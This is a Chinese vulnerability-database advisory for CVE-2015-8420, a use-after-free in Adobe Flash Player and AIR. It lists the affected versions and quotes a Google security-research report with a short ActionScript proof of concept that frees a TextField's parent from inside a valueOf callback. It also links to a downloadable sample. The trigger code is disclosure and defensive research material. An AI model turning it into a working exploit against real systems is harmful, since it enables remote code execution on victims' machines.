多款Adobe产品释放后重用漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1123166 漏洞类型 其他
发布时间 2015-12-18 更新时间 2015-12-18
CVE编号 CVE-2015-8420 CNNVD-ID CNNVD-201512-250
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/39044
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201512-250
|漏洞详情
AdobeFlashPlayer、AdobeAIRSDK和AdobeAIRSDK&Compiler都是美国奥多比(Adobe)公司的产品。AdobeFlashPlayer是一款多媒体播放器产品;AdobeAIRSDK和AdobeAIRSDK&Compiler都是适用于AdobeAIR(一个跨操作系统的运行时环境)的标准开发工具包。多款Adobe产品中存在释放后重用漏洞。攻击者可利用该漏洞执行任意代码,控制受影响系统。以下产品及版本受到影响:基于Windows和Macintosh平台的AdobeFlashPlayerDesktopRuntime19.0.0.245及之前版本和AdobeFlashPlayerExtendedSupportRelease18.0.0.261及之前版本,基于Windows、Macintosh、Linux和ChromeOS平台的AdobeFlashPlayerforGoogleChrome19.0.0.245及之前版本,基于Windows10平台的AdobeFlashPlayerforMicrosoftEdgeandInternetExplorer1119.0.0.245及之前版本,基于Windows8.0和8.1平台的AdobeFlashPlayerforInternetExplorer10and1119.0.0.245及之前版本,基于Linux平台的AdobeFlashPlayerforLinux11.2.202.548及之前版本,基于Windows和Macintosh平台的AIRDesktopRuntime19.0.0.241及之前版本,基于Windows、Macintosh、Android和iOS平台的AIRSDK19.0.0.241及之前版本和AIRSDK&Compiler19.0.0.241及之前版本,基于Android平台的AIRforAndroid19.0.0.241及之前版本。
|漏洞EXP
Source: https://code.google.com/p/google-security-research/issues/detail?id=588

There is a use-after-free in the TextField sharpness setter. If the sharpness parameter is an object with valueOf set to a function which frees the TextField parent, it is used after it is freed.

A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.sharpness = {valueOf : func};

function func(){
   
        if(times == 0){
          times++;
          return 0;
        }

	mc.removeMovieClip();

        // Fix heap here

	return 0;
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39044.zip
|参考资料

来源:helpx.adobe.com
链接:https://helpx.adobe.com/security/products/flash-player/apsb15-32.html